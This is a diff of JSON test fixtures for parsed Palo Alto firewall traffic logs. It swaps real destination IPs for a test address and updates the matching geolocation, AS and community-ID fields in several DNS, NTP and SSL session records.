@@ -12138,27 +12252,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 149, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -12177,7 +12293,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12192,7 +12308,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -12214,7 +12330,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:5IHTDvzRd4yPLPdpI4ErHcRK4/w=" + "community_id": "1:TP97MYHMqjGEwqLRwc1YYh3ZNh8=" } }, "sequence_number": 32091185, 
@@ -12234,8 +12350,8 @@ ], "network": { "community_id": [ - "1:uTxp5xDc9k43Sc1xNxNrsxzfM/I=", - "1:5IHTDvzRd4yPLPdpI4ErHcRK4/w=" + "1:cTo0xm7D3/5fRCbdwwuwUxi722g=", + "1:TP97MYHMqjGEwqLRwc1YYh3ZNh8=" ], "transport": "udp", "application": "dns", @@ -12275,14 +12391,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942106210Z", - "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031824900Z", + "original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:47.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -12305,27 +12421,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 202, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -12344,7 +12462,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12359,7 +12477,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -12381,7 +12499,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:0s4n+/itsIbV3mUc8OnOxmZ6exs=" + "community_id": "1:G2nWQeko18fm7LG80vVA2C3krF4=" } }, "sequence_number": 32091186, 
@@ -12401,8 +12519,8 @@ ], "network": { "community_id": [ - "1:hwpLJFJeocCuki/uuS7DMUwYAcc=", - "1:0s4n+/itsIbV3mUc8OnOxmZ6exs=" + "1:HivHFd76C8fGYRMgg2/dN+qo64I=", + "1:G2nWQeko18fm7LG80vVA2C3krF4=" ], "transport": "udp", "application": "dns", @@ -12442,14 +12560,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942110250Z", - "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031830600Z", + "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -12472,27 +12590,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 195, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -12511,7 +12631,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12526,7 +12646,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -12548,7 +12668,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:+GsjKlESn/QeXwrAsS8c8EaMzi0=" + "community_id": "1:skBdPMEq89/IUuq3+XIkE66uttE=" } }, "sequence_number": 32091187, 
@@ -12568,8 +12688,8 @@ ], "network": { "community_id": [ - "1:PL/uhiXbtv9YRtGDNEfmkWyMpEw=", - "1:+GsjKlESn/QeXwrAsS8c8EaMzi0=" + "1:PwRRWHkgbRmPTd6QdE3JdT1K2MI=", + "1:skBdPMEq89/IUuq3+XIkE66uttE=" ], "transport": "udp", "application": "dns", @@ -12609,14 +12729,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942113911Z", - "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031836Z", + "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -12639,27 +12759,29 @@ "destination": { "nat": { "port": 123, - "ip": "208.83.246.20" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 30303, + "number": 4837, "organization": { - "name": "Ooma, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 123, "bytes": 90, - "ip": "208.83.246.20", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -12678,7 +12800,7 @@ "packets": 1, "ip": "192.168.15.195" }, - "message": "192.168.15.195,208.83.246.20,192.168.1.63,208.83.246.20,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.195,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12693,7 +12815,7 @@ "destination": { "nat": { "port": 123, - "ip": "208.83.246.20" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -12715,7 +12837,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:OSARbLstqz9D5CGo0NQuv0a9g20=" + "community_id": "1:0JBiFALZ5+EqldWjAGvPg9L1/F4=" } }, "sequence_number": 32091188, 
@@ -12735,8 +12857,8 @@ ], "network": { "community_id": [ - "1:zSTxlbsV3qi7ri6QQifUc6oMz/o=", - "1:OSARbLstqz9D5CGo0NQuv0a9g20=" + "1:r9DVMebzpXyl8Djuzm9yZHSPHpI=", + "1:0JBiFALZ5+EqldWjAGvPg9L1/F4=" ], "transport": "udp", "application": "ntp", @@ -12776,14 +12898,14 @@ ], "ip": [ "192.168.15.195", - "208.83.246.20", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942117589Z", - "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,208.83.246.20,192.168.1.63,208.83.246.20,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031843200Z", + "original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:48.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -12806,27 +12928,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 192, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 2 }, "rule": { @@ -12845,7 +12969,7 @@ "packets": 2, "ip": "192.168.15.196" }, - "message": "192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -12860,7 +12984,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -12882,7 +13006,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:Cc+ekkpKaB3f2BPdSyd/esY/QVI=" + "community_id": "1:x1R9iKG6gpfTr38oGDxd94TaJfw=" } }, "sequence_number": 32091189, 
@@ -12902,8 +13026,8 @@ ], "network": { "community_id": [ - "1:E2LqiKHR3ZQXGMA0QsH84jNNC/0=", - "1:Cc+ekkpKaB3f2BPdSyd/esY/QVI=" + "1:ZXjKRdtLBmEkac907R8hepJQAgc=", + "1:x1R9iKG6gpfTr38oGDxd94TaJfw=" ], "transport": "udp", "application": "dns", @@ -12943,14 +13067,14 @@ ], "ip": [ "192.168.15.196", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942121144Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031849100Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -12972,27 +13096,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 208, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13011,7 +13137,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13026,7 +13152,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -13048,7 +13174,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:uPFYX4KL/wjyCp4kt+08v7myT3w=" + "community_id": "1:KACwzOgJLPdAmFb3AUQwHtScx8A=" } }, "sequence_number": 32091190, 
@@ -13068,8 +13194,8 @@ ], "network": { "community_id": [ - "1:wZXxVANJq0JID3j0Sh2o/qnIa7A=", - "1:uPFYX4KL/wjyCp4kt+08v7myT3w=" + "1:8KNguHP76fjqnY2FMkcbeO9WBCk=", + "1:KACwzOgJLPdAmFb3AUQwHtScx8A=" ], "transport": "udp", "application": "dns", @@ -13109,14 +13235,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942124628Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031854500Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -13138,27 +13264,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 100, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13177,7 +13305,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13192,7 +13320,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -13214,7 +13342,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:f3vxOCmoOo/FOLV6VRqKjZ7eUVE=" + "community_id": "1:uPSyttH6wPoIrM2ANku8B7uB8Ek=" } }, "sequence_number": 32091191, 
@@ -13234,8 +13362,8 @@ ], "network": { "community_id": [ - "1:GzSDvCcBuprowvf40RNRaGTOn+A=", - "1:f3vxOCmoOo/FOLV6VRqKjZ7eUVE=" + "1:S1I23bkB/fNp16aIx8LE9+qfQMI=", + "1:uPSyttH6wPoIrM2ANku8B7uB8Ek=" ], "transport": "udp", "application": "dns", @@ -13275,14 +13403,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942128144Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031859900Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -13304,29 +13432,29 @@ "destination": { "nat": { "port": 443, - "ip": "35.185.88.112" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.2481, - "lat": 38.6583 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 7237, - "ip": "35.185.88.112", + "ip": "175.16.199.1", "packets": 11 }, "rule": { @@ -13345,7 +13473,7 @@ "packets": 13, "ip": "192.168.15.224" }, - "message": "192.168.15.224,35.185.88.112,192.168.1.63,35.185.88.112,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United 